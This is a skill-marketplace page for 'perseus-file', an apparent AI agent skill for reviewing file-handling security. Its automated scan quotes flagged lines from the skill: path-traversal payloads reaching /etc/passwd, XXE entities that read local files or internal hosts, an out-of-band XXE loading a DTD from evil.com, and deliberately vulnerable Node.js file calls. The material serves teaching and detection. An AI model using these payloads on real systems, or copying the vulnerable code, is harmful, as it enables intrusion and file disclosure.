Skip to main content

perseus-file

Perseus File analyzes file security vulnerabilities like path traversal and XXE in user codebases, ensuring robust defense against attacks.

Install this skill

or
0/100

Security score

The perseus-file skill was audited on Mar 1, 2026 and we found 23 security issues across 3 threat categories, including 2 critical. Review the findings below before installing.

Categories Tested

Security Issues

medium line 84

Template literal with variable interpolation in command context

SourceSKILL.md
84fs.readFileSync(`./uploads/${filename}`); // filename = "../../../etc/passwd"
medium line 160

Template literal with variable interpolation in command context

SourceSKILL.md
160fs.writeFileSync(`./data/${req.body.filename}`, content);
medium line 170

Template literal with variable interpolation in command context

SourceSKILL.md
170fs.unlinkSync(`./uploads/${req.params.file}`);
medium line 266

Template literal with variable interpolation in command context

SourceSKILL.md
266const dest = `uploads/${req.file.originalname}`;
medium line 269

Template literal with variable interpolation in command context

SourceSKILL.md
269const dest = `uploads/${crypto.randomUUID()}${ext}`;
high line 485

Template literal with variable interpolation in command context

SourceSKILL.md
485res.sendFile(`./uploads/${file}`);
high line 84

Access to /etc/passwd

SourceSKILL.md
84fs.readFileSync(`./uploads/${filename}`); // filename = "../../../etc/passwd"
high line 179

Access to /etc/passwd

SourceSKILL.md
179../../../etc/passwd
high line 182

Access to /etc/passwd

SourceSKILL.md
182....//....//....//etc/passwd
high line 183

Access to /etc/passwd

SourceSKILL.md
183..\/..\/..\/etc/passwd (Windows)
high line 325

Access to /etc/passwd

SourceSKILL.md
325<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
high line 433

Access to /etc/passwd

SourceSKILL.md
433// Attack: file:///etc/passwd
critical line 449

Access to /etc/passwd

SourceSKILL.md
449| Path Traversal | `../../../etc/passwd` | File contents returned |
critical line 491

Access to /etc/passwd

SourceSKILL.md
491GET /download?file=../../../etc/passwd
medium line 84

Path traversal to sensitive directory

SourceSKILL.md
84fs.readFileSync(`./uploads/${filename}`); // filename = "../../../etc/passwd"
medium line 179

Path traversal to sensitive directory

SourceSKILL.md
179../../../etc/passwd
high line 449

Path traversal to sensitive directory

SourceSKILL.md
449| Path Traversal | `../../../etc/passwd` | File contents returned |
high line 491

Path traversal to sensitive directory

SourceSKILL.md
491GET /download?file=../../../etc/passwd
low line 301

External URL reference

SourceSKILL.md
301dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
low line 302

External URL reference

SourceSKILL.md
302dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
low line 303

External URL reference

SourceSKILL.md
303dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
low line 329

External URL reference

SourceSKILL.md
329<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/">]>
low line 332

External URL reference

SourceSKILL.md
332<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">%xxe;]>
Scanned on Mar 1, 2026
View Security Dashboard

Install this skill with one command

/learn @kaivyy/file-security
GitHub Stars 31
Rate this skill
Categorydevelopment
UpdatedMarch 29, 2026
openclawbackendsecurity-engineerbackend-developerdevops-sredevelopment
kaivyy/perseus